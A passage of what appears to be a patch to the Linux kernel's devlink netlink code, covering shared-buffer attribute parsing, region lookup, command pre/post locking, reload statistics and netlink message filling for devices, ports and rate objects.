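++/* Book-keeping for one shared buffer (sb) instance registered on a
++ * devlink device: its size and the number of ingress/egress pools and
++ * traffic classes it exposes.
++ */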
++struct devlink_sb {
++	struct list_head list;
++	unsigned int index;
++	u32 size;
++	u16 ingress_pools_count;
++	u16 egress_pools_count;
++	u16 ingress_tc_count;
++	u16 egress_tc_count;
++};
++
++static u16 devlink_sb_pool_count(struct devlink_sb *devlink_sb)
++{
++	return devlink_sb->ingress_pools_count + devlink_sb->egress_pools_count;
++}
++
++static struct devlink_sb *devlink_sb_get_by_index(struct devlink *devlink,
++						  unsigned int sb_index)
++{
++	struct devlink_sb *devlink_sb;
++
++	list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
++		if (devlink_sb->index == sb_index)
++			return devlink_sb;
++	}
++	return NULL;
++}
++
++static bool devlink_sb_index_exists(struct devlink *devlink,
++				    unsigned int sb_index)
++{
++	return devlink_sb_get_by_index(devlink, sb_index);
++}
++
++static struct devlink_sb *devlink_sb_get_from_attrs(struct devlink *devlink,
++						    struct nlattr **attrs)
++{
++	if (attrs[DEVLINK_ATTR_SB_INDEX]) {
++		u32 sb_index = nla_get_u32(attrs[DEVLINK_ATTR_SB_INDEX]);
++		struct devlink_sb *devlink_sb;
++
++		devlink_sb = devlink_sb_get_by_index(devlink, sb_index);
++		if (!devlink_sb)
++			return ERR_PTR(-ENODEV);
++		return devlink_sb;
++	}
++	return ERR_PTR(-EINVAL);
++}
++
++static struct devlink_sb *devlink_sb_get_from_info(struct devlink *devlink,
++						   struct genl_info *info)
++{
++	return devlink_sb_get_from_attrs(devlink, info->attrs);
++}
++
++static int devlink_sb_pool_index_get_from_attrs(struct devlink_sb *devlink_sb,
++						struct nlattr **attrs,
++						u16 *p_pool_index)
++{
++	u16 val;
++
++	if (!attrs[DEVLINK_ATTR_SB_POOL_INDEX])
++		return -EINVAL;
++
++	val = nla_get_u16(attrs[DEVLINK_ATTR_SB_POOL_INDEX]);
++	if (val >= devlink_sb_pool_count(devlink_sb))
++		return -EINVAL;
++	*p_pool_index = val;
++	return 0;
++}
++
++static int devlink_sb_pool_index_get_from_info(struct devlink_sb *devlink_sb,
++					       struct genl_info *info,
++					       u16 *p_pool_index)
++{
++	return devlink_sb_pool_index_get_from_attrs(devlink_sb, info->attrs,
++						    p_pool_index);
++}
++
++static int
++devlink_sb_pool_type_get_from_attrs(struct nlattr **attrs,
++				    enum devlink_sb_pool_type *p_pool_type)
++{
++	u8 val;
++
++	if (!attrs[DEVLINK_ATTR_SB_POOL_TYPE])
++		return -EINVAL;
++
++	val = nla_get_u8(attrs[DEVLINK_ATTR_SB_POOL_TYPE]);
++	if (val != DEVLINK_SB_POOL_TYPE_INGRESS &&
++	    val != DEVLINK_SB_POOL_TYPE_EGRESS)
++		return -EINVAL;
++	*p_pool_type = val;
++	return 0;
++}
++
++static int
++devlink_sb_pool_type_get_from_info(struct genl_info *info,
++				   enum devlink_sb_pool_type *p_pool_type)
++{
++	return devlink_sb_pool_type_get_from_attrs(info->attrs, p_pool_type);
++}
++
++static int
++devlink_sb_th_type_get_from_attrs(struct nlattr **attrs,
++				  enum devlink_sb_threshold_type *p_th_type)
++{
++	u8 val;
++
++	if (!attrs[DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE])
++		return -EINVAL;
++
++	val = nla_get_u8(attrs[DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE]);
++	if (val != DEVLINK_SB_THRESHOLD_TYPE_STATIC &&
++	    val != DEVLINK_SB_THRESHOLD_TYPE_DYNAMIC)
++		return -EINVAL;
++	*p_th_type = val;
++	return 0;
++}
++
++static int
++devlink_sb_th_type_get_from_info(struct genl_info *info,
++				 enum devlink_sb_threshold_type *p_th_type)
++{
++	return devlink_sb_th_type_get_from_attrs(info->attrs, p_th_type);
++}
++
++static int
++devlink_sb_tc_index_get_from_attrs(struct devlink_sb *devlink_sb,
++				   struct nlattr **attrs,
++				   enum devlink_sb_pool_type pool_type,
++				   u16 *p_tc_index)
++{
++	u16 val;
++
++	if (!attrs[DEVLINK_ATTR_SB_TC_INDEX])
++		return -EINVAL;
++
++	val = nla_get_u16(attrs[DEVLINK_ATTR_SB_TC_INDEX]);
++	if (pool_type == DEVLINK_SB_POOL_TYPE_INGRESS &&
++	    val >= devlink_sb->ingress_tc_count)
++		return -EINVAL;
++	if (pool_type == DEVLINK_SB_POOL_TYPE_EGRESS &&
++	    val >= devlink_sb->egress_tc_count)
++		return -EINVAL;
++	*p_tc_index = val;
++	return 0;
++}
++
++static int
++devlink_sb_tc_index_get_from_info(struct devlink_sb *devlink_sb,
++				  struct genl_info *info,
++				  enum devlink_sb_pool_type pool_type,
++				  u16 *p_tc_index)
++{
++	return devlink_sb_tc_index_get_from_attrs(devlink_sb, info->attrs,
++						  pool_type, p_tc_index);
++}
++
++struct devlink_region {
++	struct devlink *devlink;
++	struct devlink_port *port;
++	struct list_head list;
++	union {
++		const struct devlink_region_ops *ops;
++		const struct devlink_port_region_ops *port_ops;
++	};
++	struct mutex snapshot_lock; /* protects snapshot_list,
++				     * max_snapshots and cur_snapshots
++				     * consistency.
++				     */
++	struct list_head snapshot_list;
++	u32 max_snapshots;
++	u32 cur_snapshots;
++	u64 size;
++};
++
++struct devlink_snapshot {
++	struct list_head list;
++	struct devlink_region *region;
++	u8 *data;
++	u32 id;
++};
++
++static struct devlink_region *
++devlink_region_get_by_name(struct devlink *devlink, const char *region_name)
++{
++	struct devlink_region *region;
++
++	list_for_each_entry(region, &devlink->region_list, list)
++		if (!strcmp(region->ops->name, region_name))
++			return region;
++
++	return NULL;
++}
++
++static struct devlink_region *
++devlink_port_region_get_by_name(struct devlink_port *port,
++				const char *region_name)
++{
++	struct devlink_region *region;
++
++	list_for_each_entry(region, &port->region_list, list)
++		if (!strcmp(region->ops->name, region_name))
++			return region;
++
++	return NULL;
++}
++
++static struct devlink_snapshot *
++devlink_region_snapshot_get_by_id(struct devlink_region *region, u32 id)
++{
++	struct devlink_snapshot *snapshot;
++
++	list_for_each_entry(snapshot, &region->snapshot_list, list)
++		if (snapshot->id == id)
++			return snapshot;
++
++	return NULL;
++}
++
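++/* Internal per-command flags telling devlink_nl_pre_doit() which object,
++ * besides the devlink instance itself, must be looked up and stored in
++ * info->user_ptr[1] before the doit handler runs.
++ */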
++#define DEVLINK_NL_FLAG_NEED_PORT		BIT(0)
++#define DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT	BIT(1)
++#define DEVLINK_NL_FLAG_NEED_RATE		BIT(2)
++#define DEVLINK_NL_FLAG_NEED_RATE_NODE		BIT(3)
++#define DEVLINK_NL_FLAG_NEED_LINECARD		BIT(4)
++
++static int devlink_nl_pre_doit(const struct genl_ops *ops,
++			       struct sk_buff *skb, struct genl_info *info)
++{
++	struct devlink_linecard *linecard;
++	struct devlink_port *devlink_port;
++	struct devlink *devlink;
++	int err;
++
++	devlink = devlink_get_from_attrs(genl_info_net(info), info->attrs);
++	if (IS_ERR(devlink))
++		return PTR_ERR(devlink);
++	devl_lock(devlink);
++	info->user_ptr[0] = devlink;
++	if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_PORT) {
++		devlink_port = devlink_port_get_from_info(devlink, info);
++		if (IS_ERR(devlink_port)) {
++			err = PTR_ERR(devlink_port);
++			goto unlock;
++		}
++		info->user_ptr[1] = devlink_port;
++	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT) {
++		devlink_port = devlink_port_get_from_info(devlink, info);
++		if (!IS_ERR(devlink_port))
++			info->user_ptr[1] = devlink_port;
++	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_RATE) {
++		struct devlink_rate *devlink_rate;
++
++		devlink_rate = devlink_rate_get_from_info(devlink, info);
++		if (IS_ERR(devlink_rate)) {
++			err = PTR_ERR(devlink_rate);
++			goto unlock;
++		}
++		info->user_ptr[1] = devlink_rate;
++	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_RATE_NODE) {
++		struct devlink_rate *rate_node;
++
++		rate_node = devlink_rate_node_get_from_info(devlink, info);
++		if (IS_ERR(rate_node)) {
++			err = PTR_ERR(rate_node);
++			goto unlock;
++		}
++		info->user_ptr[1] = rate_node;
++	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_LINECARD) {
++		linecard = devlink_linecard_get_from_info(devlink, info);
++		if (IS_ERR(linecard)) {
++			err = PTR_ERR(linecard);
++			goto unlock;
++		}
++		info->user_ptr[1] = linecard;
++	}
++	return 0;
++
++unlock:
++	devl_unlock(devlink);
++	devlink_put(devlink);
++	return err;
++}
++
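++/* Counterpart of devlink_nl_pre_doit(): drops the linecard reference
++ * taken during lookup (if any), the instance lock and the devlink
++ * reference.
++ */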
++static void devlink_nl_post_doit(const struct genl_ops *ops,
++				 struct sk_buff *skb, struct genl_info *info)
++{
++	struct devlink_linecard *linecard;
++	struct devlink *devlink;
++
++	devlink = info->user_ptr[0];
++	if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_LINECARD) {
++		linecard = info->user_ptr[1];
++		devlink_linecard_put(linecard);
++	}
++	devl_unlock(devlink);
++	devlink_put(devlink);
++}
++
++static struct genl_family devlink_nl_family;
++
++enum devlink_multicast_groups {
++	DEVLINK_MCGRP_CONFIG,
++};
++
++static const struct genl_multicast_group devlink_nl_mcgrps[] = {
++	[DEVLINK_MCGRP_CONFIG] = { .name = DEVLINK_GENL_MCGRP_CONFIG_NAME },
++};
++
++static int devlink_nl_put_handle(struct sk_buff *msg, struct devlink *devlink)
++{
++	if (nla_put_string(msg, DEVLINK_ATTR_BUS_NAME, devlink->dev->bus->name))
++		return -EMSGSIZE;
++	if (nla_put_string(msg, DEVLINK_ATTR_DEV_NAME, dev_name(devlink->dev)))
++		return -EMSGSIZE;
++	return 0;
++}
++
++static int devlink_nl_put_nested_handle(struct sk_buff *msg, struct devlink *devlink)
++{
++	struct nlattr *nested_attr;
++
++	nested_attr = nla_nest_start(msg, DEVLINK_ATTR_NESTED_DEVLINK);
++	if (!nested_attr)
++		return -EMSGSIZE;
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++
++	nla_nest_end(msg, nested_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, nested_attr);
++	return -EMSGSIZE;
++}
++
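++/* Action/limit pairs that can never be satisfied together (e.g. a driver
++ * re-init necessarily causes downtime), skipped wherever combinations
++ * are walked.
++ */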
++struct devlink_reload_combination {
++	enum devlink_reload_action action;
++	enum devlink_reload_limit limit;
++};
++
++static const struct devlink_reload_combination devlink_reload_invalid_combinations[] = {
++	{
++		/* can't reinitialize driver with no down time */
++		.action = DEVLINK_RELOAD_ACTION_DRIVER_REINIT,
++		.limit = DEVLINK_RELOAD_LIMIT_NO_RESET,
++	},
++};
++
++static bool
++devlink_reload_combination_is_invalid(enum devlink_reload_action action,
++				      enum devlink_reload_limit limit)
++{
++	int i;
++
++	for (i = 0; i < ARRAY_SIZE(devlink_reload_invalid_combinations); i++)
++		if (devlink_reload_invalid_combinations[i].action == action &&
++		    devlink_reload_invalid_combinations[i].limit == limit)
++			return true;
++	return false;
++}
++
++static bool
++devlink_reload_action_is_supported(struct devlink *devlink, enum devlink_reload_action action)
++{
++	return test_bit(action, &devlink->ops->reload_actions);
++}
++
++static bool
++devlink_reload_limit_is_supported(struct devlink *devlink, enum devlink_reload_limit limit)
++{
++	return test_bit(limit, &devlink->ops->reload_limits);
++}
++
++static int devlink_reload_stat_put(struct sk_buff *msg,
++				   enum devlink_reload_limit limit, u32 value)
++{
++	struct nlattr *reload_stats_entry;
++
++	reload_stats_entry = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_STATS_ENTRY);
++	if (!reload_stats_entry)
++		return -EMSGSIZE;
++
++	if (nla_put_u8(msg, DEVLINK_ATTR_RELOAD_STATS_LIMIT, limit) ||
++	    nla_put_u32(msg, DEVLINK_ATTR_RELOAD_STATS_VALUE, value))
++		goto nla_put_failure;
++	nla_nest_end(msg, reload_stats_entry);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, reload_stats_entry);
++	return -EMSGSIZE;
++}
++
++static int devlink_reload_stats_put(struct sk_buff *msg, struct devlink *devlink, bool is_remote)
++{
++	struct nlattr *reload_stats_attr, *act_info, *act_stats;
++	int i, j, stat_idx;
++	u32 value;
++
++	if (!is_remote)
++		reload_stats_attr = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_STATS);
++	else
++		reload_stats_attr = nla_nest_start(msg, DEVLINK_ATTR_REMOTE_RELOAD_STATS);
++
++	if (!reload_stats_attr)
++		return -EMSGSIZE;
++
++	for (i = 0; i <= DEVLINK_RELOAD_ACTION_MAX; i++) {
++		if ((!is_remote &&
++		     !devlink_reload_action_is_supported(devlink, i)) ||
++		    i == DEVLINK_RELOAD_ACTION_UNSPEC)
++			continue;
++		act_info = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_ACTION_INFO);
++		if (!act_info)
++			goto nla_put_failure;
++
++		if (nla_put_u8(msg, DEVLINK_ATTR_RELOAD_ACTION, i))
++			goto action_info_nest_cancel;
++		act_stats = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_ACTION_STATS);
++		if (!act_stats)
++			goto action_info_nest_cancel;
++
++		for (j = 0; j <= DEVLINK_RELOAD_LIMIT_MAX; j++) {
++			/* Remote stats are shown even if not locally supported.
++			 * Stats of actions with an unspecified limit are shown
++			 * even though drivers don't need to register the
++			 * unspecified limit.
++			 */
++			if ((!is_remote && j != DEVLINK_RELOAD_LIMIT_UNSPEC &&
++			     !devlink_reload_limit_is_supported(devlink, j)) ||
++			    devlink_reload_combination_is_invalid(i, j))
++				continue;
++
++			stat_idx = j * __DEVLINK_RELOAD_ACTION_MAX + i;
++			if (!is_remote)
++				value = devlink->stats.reload_stats[stat_idx];
++			else
++				value = devlink->stats.remote_reload_stats[stat_idx];
++			if (devlink_reload_stat_put(msg, j, value))
++				goto action_stats_nest_cancel;
++		}
++		nla_nest_end(msg, act_stats);
++		nla_nest_end(msg, act_info);
++	}
++	nla_nest_end(msg, reload_stats_attr);
++	return 0;
++
++action_stats_nest_cancel:
++	nla_nest_cancel(msg, act_stats);
++action_info_nest_cancel:
++	nla_nest_cancel(msg, act_info);
++nla_put_failure:
++	nla_nest_cancel(msg, reload_stats_attr);
++	return -EMSGSIZE;
++}
++
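++/* Fill one device message: the bus/dev handle, the reload-failed flag
++ * and the nested local and remote reload statistics.
++ */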
++static int devlink_nl_fill(struct sk_buff *msg, struct devlink *devlink,
++			   enum devlink_command cmd, u32 portid,
++			   u32 seq, int flags)
++{
++	struct nlattr *dev_stats;
++	void *hdr;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++	if (nla_put_u8(msg, DEVLINK_ATTR_RELOAD_FAILED, devlink->reload_failed))
++		goto nla_put_failure;
++
++	dev_stats = nla_nest_start(msg, DEVLINK_ATTR_DEV_STATS);
++	if (!dev_stats)
++		goto nla_put_failure;
++
++	if (devlink_reload_stats_put(msg, devlink, false))
++		goto dev_stats_nest_cancel;
++	if (devlink_reload_stats_put(msg, devlink, true))
++		goto dev_stats_nest_cancel;
++
++	nla_nest_end(msg, dev_stats);
++	genlmsg_end(msg, hdr);
++	return 0;
++
++dev_stats_nest_cancel:
++	nla_nest_cancel(msg, dev_stats);
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static void devlink_notify(struct devlink *devlink, enum devlink_command cmd)
++{
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON(cmd != DEVLINK_CMD_NEW && cmd != DEVLINK_CMD_DEL);
++	WARN_ON(!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED));
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_fill(msg, devlink, cmd, 0, 0, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
++				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static int devlink_nl_port_attrs_put(struct sk_buff *msg,
++				     struct devlink_port *devlink_port)
++{
++	struct devlink_port_attrs *attrs = &devlink_port->attrs;
++
++	if (!devlink_port->attrs_set)
++		return 0;
++	if (attrs->lanes) {
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_LANES, attrs->lanes))
++			return -EMSGSIZE;
++	}
++	if (nla_put_u8(msg, DEVLINK_ATTR_PORT_SPLITTABLE, attrs->splittable))
++		return -EMSGSIZE;
++	if (nla_put_u16(msg, DEVLINK_ATTR_PORT_FLAVOUR, attrs->flavour))
++		return -EMSGSIZE;
++	switch (devlink_port->attrs.flavour) {
++	case DEVLINK_PORT_FLAVOUR_PCI_PF:
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_CONTROLLER_NUMBER,
++				attrs->pci_pf.controller) ||
++		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_PF_NUMBER, attrs->pci_pf.pf))
++			return -EMSGSIZE;
++		if (nla_put_u8(msg, DEVLINK_ATTR_PORT_EXTERNAL, attrs->pci_pf.external))
++			return -EMSGSIZE;
++		break;
++	case DEVLINK_PORT_FLAVOUR_PCI_VF:
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_CONTROLLER_NUMBER,
++				attrs->pci_vf.controller) ||
++		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_PF_NUMBER, attrs->pci_vf.pf) ||
++		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_VF_NUMBER, attrs->pci_vf.vf))
++			return -EMSGSIZE;
++		if (nla_put_u8(msg, DEVLINK_ATTR_PORT_EXTERNAL, attrs->pci_vf.external))
++			return -EMSGSIZE;
++		break;
++	case DEVLINK_PORT_FLAVOUR_PCI_SF:
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_CONTROLLER_NUMBER,
++				attrs->pci_sf.controller) ||
++		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_PF_NUMBER,
++				attrs->pci_sf.pf) ||
++		    nla_put_u32(msg, DEVLINK_ATTR_PORT_PCI_SF_NUMBER,
++				attrs->pci_sf.sf))
++			return -EMSGSIZE;
++		break;
++	case DEVLINK_PORT_FLAVOUR_PHYSICAL:
++	case DEVLINK_PORT_FLAVOUR_CPU:
++	case DEVLINK_PORT_FLAVOUR_DSA:
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_NUMBER,
++				attrs->phys.port_number))
++			return -EMSGSIZE;
++		if (!attrs->split)
++			return 0;
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_SPLIT_GROUP,
++				attrs->phys.port_number))
++			return -EMSGSIZE;
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_SPLIT_SUBPORT_NUMBER,
++				attrs->phys.split_subport_number))
++			return -EMSGSIZE;
++		break;
++	default:
++		break;
++	}
++	return 0;
++}
++
++static int devlink_port_fn_hw_addr_fill(const struct devlink_ops *ops,
++					struct devlink_port *port,
++					struct sk_buff *msg,
++					struct netlink_ext_ack *extack,
++					bool *msg_updated)
++{
++	u8 hw_addr[MAX_ADDR_LEN];
++	int hw_addr_len;
++	int err;
++
++	if (!ops->port_function_hw_addr_get)
++		return 0;
++
++	err = ops->port_function_hw_addr_get(port, hw_addr, &hw_addr_len,
++					     extack);
++	if (err) {
++		if (err == -EOPNOTSUPP)
++			return 0;
++		return err;
++	}
++	err = nla_put(msg, DEVLINK_PORT_FUNCTION_ATTR_HW_ADDR, hw_addr_len, hw_addr);
++	if (err)
++		return err;
++	*msg_updated = true;
++	return 0;
++}
++
++static int devlink_nl_rate_fill(struct sk_buff *msg,
++				struct devlink_rate *devlink_rate,
++				enum devlink_command cmd, u32 portid, u32 seq,
++				int flags, struct netlink_ext_ack *extack)
++{
++	struct devlink *devlink = devlink_rate->devlink;
++	void *hdr;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++
++	if (nla_put_u16(msg, DEVLINK_ATTR_RATE_TYPE, devlink_rate->type))
++		goto nla_put_failure;
++
++	if (devlink_rate_is_leaf(devlink_rate)) {
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX,
++				devlink_rate->devlink_port->index))
++			goto nla_put_failure;
++	} else if (devlink_rate_is_node(devlink_rate)) {
++		if (nla_put_string(msg, DEVLINK_ATTR_RATE_NODE_NAME,
++				   devlink_rate->name))
++			goto nla_put_failure;
++	}
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_RATE_TX_SHARE,
++			      devlink_rate->tx_share, DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_RATE_TX_MAX,
++			      devlink_rate->tx_max, DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	if (devlink_rate->parent)
++		if (nla_put_string(msg, DEVLINK_ATTR_RATE_PARENT_NODE_NAME,
++				   devlink_rate->parent->name))
++			goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static bool
++devlink_port_fn_state_valid(enum devlink_port_fn_state state)
++{
++	return state == DEVLINK_PORT_FN_STATE_INACTIVE ||
++	       state == DEVLINK_PORT_FN_STATE_ACTIVE;
++}
++
++static bool
++devlink_port_fn_opstate_valid(enum devlink_port_fn_opstate opstate)
++{
++	return opstate == DEVLINK_PORT_FN_OPSTATE_DETACHED ||
++	       opstate == DEVLINK_PORT_FN_OPSTATE_ATTACHED;
++}
++
++static int devlink_port_fn_state_fill(const struct devlink_ops *ops,
++				      struct devlink_port *port,
++				      struct sk_buff *msg,
++				      struct netlink_ext_ack *extack,
++				      bool *msg_updated)
++{
++	enum devlink_port_fn_opstate opstate;
++	enum devlink_port_fn_state state;
++	int err;
++
++	if (!ops->port_fn_state_get)
++		return 0;
++
++	err = ops->port_fn_state_get(port, &state, &opstate, extack);
++	if (err) {
++		if (err == -EOPNOTSUPP)
++			return 0;
++		return err;
++	}
++	if (!devlink_port_fn_state_valid(state)) {
++		WARN_ON_ONCE(1);
++		NL_SET_ERR_MSG_MOD(extack, "Invalid state read from driver");
++		return -EINVAL;
++	}
++	if (!devlink_port_fn_opstate_valid(opstate)) {
++		WARN_ON_ONCE(1);
++		NL_SET_ERR_MSG_MOD(extack,
++				   "Invalid operational state read from driver");
++		return -EINVAL;
++	}
++	if (nla_put_u8(msg, DEVLINK_PORT_FN_ATTR_STATE, state) ||
++	    nla_put_u8(msg, DEVLINK_PORT_FN_ATTR_OPSTATE, opstate))
++		return -EMSGSIZE;
++	*msg_updated = true;
++	return 0;
++}
++
++static int
++devlink_nl_port_function_attrs_put(struct sk_buff *msg, struct devlink_port *port,
++				   struct netlink_ext_ack *extack)
++{
++	const struct devlink_ops *ops;
++	struct nlattr *function_attr;
++	bool msg_updated = false;
++	int err;
++
++	function_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_PORT_FUNCTION);
++	if (!function_attr)
++		return -EMSGSIZE;
++
++	ops = port->devlink->ops;
++	err = devlink_port_fn_hw_addr_fill(ops, port, msg, extack,
++					   &msg_updated);
++	if (err)
++		goto out;
++	err = devlink_port_fn_state_fill(ops, port, msg, extack, &msg_updated);
++out:
++	if (err || !msg_updated)
++		nla_nest_cancel(msg, function_attr);
++	else
++		nla_nest_end(msg, function_attr);
++	return err;
++}
++
++static int devlink_nl_port_fill(struct sk_buff *msg,
++				struct devlink_port *devlink_port,
++				enum devlink_command cmd, u32 portid, u32 seq,
++				int flags, struct netlink_ext_ack *extack)
++{
++	struct devlink *devlink = devlink_port->devlink;
++	void *hdr;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, devlink_port->index))
++		goto nla_put_failure;
++
++	/* Hold rtnl lock while accessing port's netdev attributes. */
++	rtnl_lock();
++	spin_lock_bh(&devlink_port->type_lock);
++	if (nla_put_u16(msg, DEVLINK_ATTR_PORT_TYPE, devlink_port->type))
++		goto nla_put_failure_type_locked;
++	if (devlink_port->desired_type != DEVLINK_PORT_TYPE_NOTSET &&
++	    nla_put_u16(msg, DEVLINK_ATTR_PORT_DESIRED_TYPE,
++			devlink_port->desired_type))
++		goto nla_put_failure_type_locked;
++	if (devlink_port->type == DEVLINK_PORT_TYPE_ETH) {
++		struct net *net = devlink_net(devlink_port->devlink);
++		struct net_device *netdev = devlink_port->type_dev;
++
++		if (netdev && net_eq(net, dev_net(netdev)) &&
++		    (nla_put_u32(msg, DEVLINK_ATTR_PORT_NETDEV_IFINDEX,
++				 netdev->ifindex) ||
++		     nla_put_string(msg, DEVLINK_ATTR_PORT_NETDEV_NAME,
++				    netdev->name)))
++			goto nla_put_failure_type_locked;
++	}
++	if (devlink_port->type == DEVLINK_PORT_TYPE_IB) {
++		struct ib_device *ibdev = devlink_port->type_dev;
++
++		if (ibdev &&
++		    nla_put_string(msg, DEVLINK_ATTR_PORT_IBDEV_NAME,
++				   ibdev->name))
++			goto nla_put_failure_type_locked;
++	}
++	spin_unlock_bh(&devlink_port->type_lock);
++	rtnl_unlock();
++	if (devlink_nl_port_attrs_put(msg, devlink_port))
++		goto nla_put_failure;
++	if (devlink_nl_port_function_attrs_put(msg, devlink_port, extack))
++		goto nla_put_failure;
++	if (devlink_port->linecard &&
++	    nla_put_u32(msg, DEVLINK_ATTR_LINECARD_INDEX,
++			devlink_port->linecard->index))
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure_type_locked:
++	spin_unlock_bh(&devlink_port->type_lock);
++	rtnl_unlock();
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static void devlink_port_notify(struct devlink_port *devlink_port,
++				enum devlink_command cmd)
++{
++	struct devlink *devlink = devlink_port->devlink;
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON(cmd != DEVLINK_CMD_PORT_NEW && cmd != DEVLINK_CMD_PORT_DEL);
++
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_port_fill(msg, devlink_port, cmd, 0, 0, 0, NULL);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
++				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static void devlink_rate_notify(struct devlink_rate *devlink_rate,
++				enum devlink_command cmd)
++{
++	struct devlink *devlink = devlink_rate->devlink;
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON(cmd != DEVLINK_CMD_RATE_NEW && cmd != DEVLINK_CMD_RATE_DEL);
++
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_rate_fill(msg, devlink_rate, cmd, 0, 0, 0, NULL);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
++				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static int devlink_nl_cmd_rate_get_dumpit(struct sk_buff *msg,
++					  struct netlink_callback *cb)
++{
++	struct devlink_rate *devlink_rate;
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(devlink_rate, &devlink->rate_list, list) {
++			enum devlink_command cmd = DEVLINK_CMD_RATE_NEW;
++			u32 id = NETLINK_CB(cb->skb).portid;
++
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_rate_fill(msg, devlink_rate, cmd, id,
++						   cb->nlh->nlmsg_seq,
++						   NLM_F_MULTI, NULL);
++			if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	if (err != -EMSGSIZE)
++		return err;
++
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_nl_cmd_rate_get_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink_rate *devlink_rate = info->user_ptr[1];
++	struct sk_buff *msg;
++	int err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_rate_fill(msg, devlink_rate, DEVLINK_CMD_RATE_NEW,
++				   info->snd_portid, info->snd_seq, 0,
++				   info->extack);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
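++/* Return true if 'devlink_rate' is 'parent' itself or one of its
++ * ancestors; used to refuse re-parenting that would create a cycle.
++ */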
++static bool
